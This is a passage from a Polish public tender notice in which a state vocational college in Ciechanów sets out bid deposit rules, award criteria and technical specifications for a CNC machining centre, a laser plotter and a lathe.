5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
 63 1020 1592 0000 2302 0084 5701
4.	Za termin wniesienia wadium w pieniądzu uznaje się termin wpływu pieniędzy na rachunek Zamawiającego. Przelew powinien więc być dokonany w takim terminie, aby Zamawiający mógł uzyskać potwierdzenie z banku, w którym posiada rachunek, że do upływu terminu składania ofert (tj. do dnia 24. 02. 2017 r. do godz. 11:00) kwota wadium wpłynęła na rachunek bankowy Zamawiającego. W przypadku wniesienia wadium w pieniądzu do oferty należy dołączyć dokument potwierdzający dokonanie przelewu.
5.	Potwierdzeniem wniesienia wadium w formach określonych w ust. 3 pkt 2-5ustawy PZP jest oryginalny dokument wystawiony przez ubezpieczyciela, bank, poręczyciela  dokument powinien zostać umieszczony w ofercie w sposób umożliwiający jego bezproblemowe wyjęcie celem dokonania zwrotu.
6.	Wadium wniesione w formie gwarancji lub poręczeń muszą zawierać w swojej treści oznaczenie Wykonawcy, oznaczenie postępowania oraz zobowiązanie gwaranta lub poręczyciela, w okresie związania ofertą, do nieodwołalnej, bezwarunkowej, płatne na pierwsze żądanie Zamawiającego wpłaty wadium w przypadkach określonych a art. 46 ust. 4a i ust. 5 pkt 1-3 ustawy PZP.
7.	W przypadku składania oferty wspólnej, wadium wniesione przez jednego z Wykonawców uważa się za wniesione prawidłowo.
8.	Pozostałe postanowienia dotyczące wadium, w tym zasad jego zatrzymania i zwrotu określa ustawa PZP, w szczególności art. 46.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95</td></tr><tr><td>Gwarancja   </td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/02/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 90 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1/I
                  
                <b>Nazwa: </b>dostarczenie, montaż i uruchomienie pionowego centrum obróbczego sterowanego numerycznie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OPIS PRZEDMIOTU ZAMÓWIENIA

I. Przedmiotem zamówienia jest dostarczenie, montaż i uruchomienie pionowego centrum obróbczego sterowanego numerycznie, na który składają się:
	pionowe centrum obróbcze,
	zestaw głowic,
	zestaw frezów i wierteł,
	zestaw gwintowników,
	zestaw oprawek do montowania narzędzi,
	komputer przenośny,
	dokumentacja zawierająca m in.:
	architekturę maszyny,
	testy akceptacyjne,
	certyfikaty wraz z deklaracją zgodności,
	dokumentację konfiguracyjną,
	dokumentację eksploatacyjną.
W ramach realizacji przedmiotu zamówienia Wykonawca dokona montażu maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej w siedzibie Zamawiającego, uruchomienia, przeprowadzenia testów oraz szkolenia dla personelu technicznego.
1.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY TECHNICZNE
1.1.	Parametry podstawowe pionowego centrum obróbczego
Zamawiający wymaga, aby pionowe centrum obróbcze posiadało:
a)	pełną osłonę przestrzeni roboczej z dużymi przeszkleniami pozwalającymi na wzrokowe/edukacyjne śledzenie postępów obróbki,
b)	pulpit sterowniczy z pilotem zawierający minimum tzw. "Grzybek", wybór osi, i regulację przesuwu,
c)	prowadnice ślizgowe w osiach X/Y/Z zapewniające stabilność obróbki,
d)	wysokiej jakości odlewy korpusów maszyny o jednolitej strukturze nadające maszynie odpowiednią sztywność,
e)	komponenty elektryczne renomowanych firm np.: Schneider, ABB, Siemens,
f)	śruby kulowe PMI / Hiwin,
g)	wrzeciono PMI,
h)	łożyska FAG.
Podstawowe dane techniczne dotyczące urządzenia zostały zestawione w Tabeli nr 1.
Tabela 1. Podstawowe dane techniczne pionowego centrum obróbczego
OPIS PARAMETRÓW	JEDN	DANE
STÓŁ ROBOCZY
wymiary (D x SZ)	mm	min. 600x250
rowki T stołu (liczba/szerokość/rozstaw)	mm	3 lub 4/14/75
odległość końcówki wrzeciona od powierzchni stołu	mm	Min.50 max 500
PRZEJAZDY
przejazd w osi X/Y/Z	mm	Min. 400x250x400
WRZECIONO
stożek wrzeciona	-	BT30
zakres obrotów wrzeciona	obr/min	min. 40-6000
moc silnika głównego	kW	Min. 3,5
MAGAZYN NARZĘDZI
ilość narzędzi	szt	min. 10
max. średnica narzędzia	mm	Nie mniejsza niż 90
waga narzędzia	kg	max 10
WYMIARY MASZYNY
DxSxW	mm	max. 2000x2000x3000
waga	kg	max. 4000
INNE
dokładność pozycjonowania	mm	min. 0,015
powtarzalność	mm	min. 0,075

1.2.	Wyposażenie pionowego centrum obróbczego
Zamawiający wymaga, aby pionowe centrum obróbcze posiadało następujące wyposażenie:
	sterowanie SIEMENS min. 808D,
	prowadnice ślizgowe w 3 osiach,
	4 oś A (w formie podzielnicy),
	górny zakres obrotów wrzeciona min. 6000 obr/min,
	min. 10-cio narzędziowy magazyn narzędzi,
	elektroniczne kółko ręczne ( wędka ),
	zbiornik chłodziwa,
	szufladę na wióry,
	centralny, automatyczny system smarowania,
	system chłodzenia zewnętrznego,
	pistolet pneumatyczny,
	oświetlenie robocze,
	3 kolorową lampkę sygnalizacyjną,
	podkładki regulacyjne i antywibracyjne pod maszynę,
	zestaw narzędzi do obsługi maszyny,
	certyfikat CE i inne dokumenty techniczno - użytkowe,
	instrukcja obsługi i konserwacji,
	dokumentację tj. badania techniczne i eksploatacyjne w języku polskim

1.3.	Pakiet narzędzi do pionowego centrum obróbczego
Zamawiający wymaga, aby pionowe centrum obróbcze posiadało następujący pakiet narzędzi dobranych do ofertowanej maszyny:
a)	głowica fi20 trzpieniowa + 10 płytek,
b)	głowica nasadzana do planowania + 10 płytek,
c)	głowica nasadzana walcowo czołowa + 10 płytek,
d)	komplet frezów po 2 szt. fi 8,10,12,14,16 + 2 długie fi10 i bardzo długie fi10,
e)	komplet wierteł pod gwinty M6,M8,M10 + komplet gwintowników skrętnych do otworów ślepych,
f)	komplet oprawek do mocowania narzędzi (6 oprawek + 6 grzybków + komplet tulejek + 3 zabieraki do gwintowników).

1.4.	Komputer przenośny do współpracy oprogramowania SolidWorks z pionowym centrum obróbczym
Zamawiający wymaga, aby w komplecie dostarczyć komputer przenośny do pracy z maszyną pozwalający na projektowanie w posiadanym przez Zamawiającego oprogramowaniu SolidWorks w najnowszej wersji. Zestaw musi pozwalać na podłączenie komputera do maszyny i poprawną ich współpracę. Minimalne wymagania to:
	Ekran 15 cali,
	Procesor  równoważny I5-3570K lub E3-1225v2 lub wyższy,
	Pamięć RAM  min. 8 GB pamięci RAM,
	System operacyjny - Windows 7 PRO x64 lub nowszy,
	Dysk twardy  min. 1000 GB + SSD 240GB
	Karta graficzna - równoważna z Nvidia Quadro K1000 lub wyższy model,
	Napęd optyczny pozwalający na odczytywanie nośnikow danych np.: CD-ROM, DVD, Blu-ray,
	min 3 szt. USB 3.0,
	HDMI

2.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY POZATECHNICZNE
Zamawiający wymaga dostawy maszyny do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie na ul. Narutowicza 9, 06-400 Ciechanów, wykonania montażu dostarczonej maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej, uruchomienia, przeprowadzenia testów po uruchomieniowych oraz 1 dniowego szkolenia dla personelu technicznego (operatorów CNC) na dostarczonej maszynie w miejscu dostarczenia w ilości ok. 6 osób.
Dodatkowo Zamawiający wymaga organizacji min. 2 dniowego szkolenia dla operatorów CNC (ok. 4 osoby) przeprowadzonego w siedzibie dostawcy maszyny.

Zamawiający ma obowiązek dokonać oceny miejsca przeznaczonego na zainstalowanie maszyny pod kątem wytrzymałości mechanicznej , podłogi pomieszczenia .

Wykonawca ma obowiązek przedstawić Zamawiającemu potrzebny sprzęt i środki niezbędne do zdjęcia maszyny z pojazdu transportującego i wprowadzenie maszyny do obiektu w tym branie udziału w rozładunku oraz jej ustawieniu. Operacją zdjęcia i ustawienia maszyny kieruje Wykonawca.

Zamawiający musi potwierdzić posiadanie  zdolności sprzętowo  materiałowych niezbędnych  do wykonania zamówienia .
Zamawiający udostępni  przekaże Wykonawcy dane firmy, która podejmie się zdjęcia i transportu maszyny w siedzibie Zamawiającego.

Za uszkodzenia w trakcie zdejmowania i ustawienia maszyny odpowi
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42612200-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 90<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>95</td></tr><tr><td>gwarancja</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>1/II
                  
                <b>Nazwa: </b>dostarczenie, montaż i uruchomienie plotera laserowego sterowanego numerycznie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OPIS PRZEDMIOTU ZAMÓWIENIA

II. Przedmiotem zamówienia jest dostarczenie, montaż i uruchomienie plotera laserowego sterowanego numerycznie, na który składają się:
	ploter laserowy z głowicą CO2,
	chłodnica cieczy 3000,
	kompresor,
	system odciągowy,
	sterowniki,
	system pozycjonowania światłem (red point),
	komplet przewodów,
	komputer przenośny,
	dokumentacja zawierająca m in.:
	architekturę maszyny,
	testy akceptacyjne,
	certyfikaty wraz z deklaracją zgodności,
	dokumentację konfiguracyjną,
	dokumentację eksploatacyjną.
Ploter laserowy sterowany numerycznie musi posiadać możliwość cięcia i grawerowania szerokiej gamy materiałów. Pole robocze plotera musi pozwalać na obróbkę małych i średnich elementów z takich materiałów jak:
a)	dla wycinania:
	tworzywa sztuczne, np. akryl, laminaty, pleksi,
	materiały naturalne, np. drewno, skóra,
	inne materiały, np. tekstylia, papier, szkło, guma.
b)	dla grawerowania:
	tworzywa sztuczne, np. akryl, laminaty, pleksi
	materiały naturalne, np. drewno, skóra, granit, marmur
	inne materiały, np. tekstylia, papier, szkło, guma.
	metale: anodowane, malowane, pokryte pastą grawerską.
W ramach realizacji przedmiotu zamówienia Wykonawca dokona montażu maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej w siedzibie Zamawiającego, uruchomienia, przeprowadzenia testów oraz szkolenia dla personelu technicznego.
1.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY TECHNICZNE
1.1.	Parametry podstawowe plotera laserowego sterowanego numerycznie
Zamawiający wymaga aby ploter laserowy sterowany numerycznie posiadał:
a)	pełną osłonę przestrzeni roboczej z dużymi przeszkleniami pozwalającymi na wzrokowe/edukacyjne śledzenie postępów obróbki,
b)	oprogramowanie do obsługi maszyny, które pozwala na współpracę z takimi programami jak CorelDraw, AutoCAD, Photoshop,
c)	solidnie wykonaną konstrukcję urządzenia w połączeniu z dobrej klasy prowadnicami liniowym oraz napędem w postaci silników krokowych gwarantuje dokładność pozycjonowania rzędu 0.01 mm.,
d)	system chłodzenia chroniący tubę lasera przed przegrzaniem.
Podstawowe dane techniczne dotyczące urządzenia zostały zestawione w Tabeli nr 1.
Tabela 1. Podstawowe dane techniczne plotera laserowego sterowanego numerycznie
OPIS PARAMETRÓW	JEDN	DANE
WIELKOŚCI PRZESTRZENI ROBOCZEJ
długość	mm	min. 1300
szerokość	mm	min. 900
LASER
Rodzaj	-	gazowy CO2
Moc	W	min. 80
INNE
Rodzaj stołu	-	podciśnieniowy
Dokładność pozycjonowania	mm	min. 0,01
Prędkość grawerowania	mm/s	min. 1-700
Prędkość cięcia	mm/s	min. 1-200
Obsługiwane pliki graficzne	-	min. DST, PLT, BMP, DXF
Zasilanie	V/Hz	230/50
Zakres temperatury pracy	C	min. 5-40
Chłodzenie	-	Cieczą min. 3000
WYMIARY MASZYNY
długość 	mm	max. 2000
szerokość	mm	max. 2000
wysokość	mm	max. 1500
waga netto 	kg	max. 1000
1.2.	Wyposażenie plotera laserowego sterowanego numerycznie
Zamawiający wymaga, aby ploter laserowy sterowany numerycznie posiadał następujące wyposażenie:
	stół podciśnieniowy,
	kamera CCD pozwalająca na prezentację prowadzonej obróbki,
	chłodnica cieczy min. 3000,
	kompresor,
	system odciągowy,
	sterowniki,
	system pozycjonowania światłem (red point),
	komplet przewodów,
	oświetlenie robocze,
	podkładki regulacyjne pod maszynę,
	zestaw narzędzi do obsługi maszyny,
	certyfikat CE  inne dokumenty techniczno - użytkowe ,
	instrukcja obsługi i konserwacji,

1.3.	Komputer przenośny do współpracy oprogramowania AutoCAD z ploterem laserowym sterowanym numerycznie
Zamawiający wymaga aby w komplecie dostarczyć komputer przenośny do pracy z maszyną pozwalający na projektowanie w posiadanym przez Zamawiającego oprogramowaniu AutoCAD w najnowszej wersji oraz obsługę oprogramowania dedykowanego do maszyny. Zestaw musi pozwalać na podłączenie komputera do maszyny i poprawną ich współpracę. Minimalne wymagania to:
	Ekran 15 cali,
	Procesor  równoważny I5-3570K lub E3-1225v2 lub wyższy,
	Pamięć RAM  min. 8 GB pamięci RAM,
	System operacyjny - Windows 7 x64 lub nowszy,
	Dysk twardy  min. 500 GB + SSD 256GB,
	Karta graficzna - równoważna z Nvidia Quadro K1000 lub wyższy model,
	Napęd optyczny pozwalający na odczytywanie nośników danych np.: CD-ROM, DVD, Blu-ray,
	Min. 3 szt. w tym USB 3.0.
	HDMI
2.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY POZATECHNICZNE
Zamawiający wymaga dostawy maszyny do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie na ul. Narutowicza 9, 06-400 Ciechanów, wykonania montażu dostarczonej maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej, uruchomienia, przeprowadzenia testów pouruchomieniowych oraz 1 dniowego szkolenia dla personelu technicznego (operatorów CNC) na dostarczonej maszynie w miejscy dostarczenia w ilości ok. 6 osób.
Zamawiający ma obowiązek dokonać oceny miejsca przeznaczonego na zainstalowanie maszyny pod kątem wytrzymałości mechanicznej , podłogi pomieszczenia .

Wykonawca ma obowiązek przedstawić Zamawiającemu potrzebny sprzęt i środki niezbędne do zdjęcia maszyny z pojazdu transportującego i wprowadzenie maszyny do obiektu w tym branie udziału w rozładunku oraz jej ustawieniu. Operacją zdjęcia i ustawienia maszyny kieruje Wykonawca.

Zamawiający musi potwierdzić posiadanie  zdolności sprzętowo  materiałowych niezbędnych  do wykonania zamówienia .

Zamawiający udostępni  przekaże Wykonawcy dane firmy, która podejmie się zdjęcia i transportu maszyny w siedzibie Zamawiającego.

Za uszkodzenia w trakcie zdejmowania i ustawienia maszyny odpowiada Wykonawca.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30232140-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 90<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>95</td></tr><tr><td>gwarancja</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>1/III
                  
                <b>Nazwa: </b>dostarczenie, montaż i uruchomienie tokarki sterowanej numerycznie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OPIS PRZEDMIOTU ZAMÓWIENIA

III. Przedmiotem zamówienia jest dostarczenie, montaż i uruchomienie tokarki sterowanej numerycznie, na który składają się:
	tokarka sterowana numerycznie,
	zestaw noży tokarskich,
	zestaw płytek skrawających,
	komputer przenośny,
	dokumentacja zawierająca m in.:
	architekturę maszyny,
	testy akceptacyjne ( eksploatacyjne ),
	certyfikaty wraz z deklaracją zgodności w języku polskim,
	dokumentację konfiguracyjną,
	dokumentację eksploatacyjną.
W ramach realizacji przedmiotu zamówienia Wykonawca dokona montażu maszyny, konfiguracji, podłączenia do istniejącej instalacji elektrycznej w siedzibie Zamawiającego, uruchomienia, przeprowadzenia testów oraz szkolenia dla personelu technicznego.

1.	WYMAGANE PRZEZ ZAMAWIAJĄCEGO PARAMETRY TECHNICZNE
1.1.	Parametry podstawowe tokarki sterowanej numerycznie
Zamawiający wymaga aby tokarka sterowana numerycznie posiadała:
a)	pełną osłonę przestrzeni roboczej z dużymi przeszkleniami pozwalającymi na wzrokowe/edukacyjne śledzenie postępów obróbki,
b)	pulpit sterowniczy z ekranem,
c)	wzmocnione łoże tokarki odlewane z żeliwa szarego,
d)	łożyskowanie wrzeciona,
e)	prowadnice łoża oraz suportu poprzecznego hartowane.
Podstawowe dane techniczne dotyczące urządzenia zostały zestawione w Tabeli nr 1.
Tabela 1. Podstawowe dane techniczne tokarki sterowanej numerycznie
OPIS PARAMETRÓW	JEDN	DANE
WIELKOŚCI
przelot nad łożem	mm	min. 320
przelot nad suportem	mm	min. 150
długość w kłach	mm	min. 500
WRZECIENNIK
zakres obrotów wrzeciona	obr/min	min. 150 - 2500
przelot wrzeciona	mm	min. 40
stożek wrzeciona	-	Morsea 6
moc silnika napędu głównego	kW	min. 3
SUPORT
przejazd w osi X	mm	min. 180
przejazd w osi Z	mm	Min. 500
max. wymiary narzędzia	mm	Min. 16 x 16
liczba narzędzi	szt	min. 5
KONIK
wysuw tulei konika	mm	min. 120
średnica tulei konika	mm	min. 60
stożek tulei konika	-	Morsea 3
WYMIARY MASZYNY
długość 	mm	max. 2000
szerokość	mm	max. 2000
wysokość	mm	max. 2000
waga netto 	kg	max. 2000
INNE
twardość prowadnic	HRC	min. 52

1.2.	Wyposażenie tokarki sterowanej numerycznie
Zamawiający wymaga, aby tokarka sterowana numerycznie posiadało następujące wyposażenie:
	sterowanie SIEMENS min. 808D,
	uchwyt manualny 3 szczękowy 150,
	konik manualny,
	Kieł obrotowy do konika,
	chłodzenie zewnętrzne,
	oświetlenie robocze,
	podkładki regulacyjne i antywibracyjne  pod maszynę,
	zestaw narzędzi do obsługi maszyny,
	certyfikat CE, deklaracje zgodności i testy eksploatacyjne w języku polskim
	instrukcja obsługi i konserwacji w języku polskim,

1.3.	Pakiet narzędzi do tokarki sterowanej numerycznie
Zamawiający wymaga, aby tokarka sterowana numerycznie posiadało następujący pakiet narzędzi dobranych do ofertowanej maszyny:
a)	Noże tokarskie min. 5 różnych rodzajów po 1 sztuce każdego typu np.:
	nóż tokarski DWLNR1616H06
	nóż tokarski DDJNR1616H11
	nóż tokarski S20S-SCLCR09
	nóż tokarski QEFD1616R17
	nóż tokarski SWR1616H16B
b)	płytki skrawające min. 8 różnych rodzajów min. po 10 sztuk każdego typu np.:
	płytka skrawająca WNMG060404-DF YBC252,
	płytka skrawająca WNMG060404-EF YBG205,
	płytka skrawająca DNMG110404-DM YBC252,
	płytka skrawająca DNMG110404-EF YBG205,
	płytka skrawająca CCMT09T304-AHF YBC152,
	płytka skrawająca CCMT09T302-EF YBG205,
	płytka skrawająca ZTFD0303-MM YB9320,
	płytka skrawająca RT16.01W-AG60PB YBG202. 
1.4.	Komputer przenośny do współpracy oprogramowania SolidWorks z tokarką sterowaną numerycznie
Zamawiający wymaga aby w komplecie dostarczyć komputer przenośny do pracy z maszyną pozwalający na projektowanie w posiadanym przez Zamawiającego oprogramowaniu SolidWorks w najnowszej wersji. Zestaw musi pozwalać na podłączenie komputera do maszyny i poprawną ich współpracę. Minimalne wymagania to:
	Ekran 15 cali,
	Procesor  równoważny I5-3570K lub E3-1225v2 lub wyższy,
	Pamięć RAM  min. 8 GB pamięci RAM,
	System operacyjny - Windows 7 PRO x64 lub nowszy,
	Dysk twardy  min. 1000 GB + SSD 240GB,
	Karta graficzna - równoważna z Nvidia Quadro K1000 lub wyższy model,
	Napęd optyczny pozwalający na odczytywanie nośników danych np.: CD-ROM, DVD, Blu-ray,
	Min. 3 szt. w tym USB 3.0.
